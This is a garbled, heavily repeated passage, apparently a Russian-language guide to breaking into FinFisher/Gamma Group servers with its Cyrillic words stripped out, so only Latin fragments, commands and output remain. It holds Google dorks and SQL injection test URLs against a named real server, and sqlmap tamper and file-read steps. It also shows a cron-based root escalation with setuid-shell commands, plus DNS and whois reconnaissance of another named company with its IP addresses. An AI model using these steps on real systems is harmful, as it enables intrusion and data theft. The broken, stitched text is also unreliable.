Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
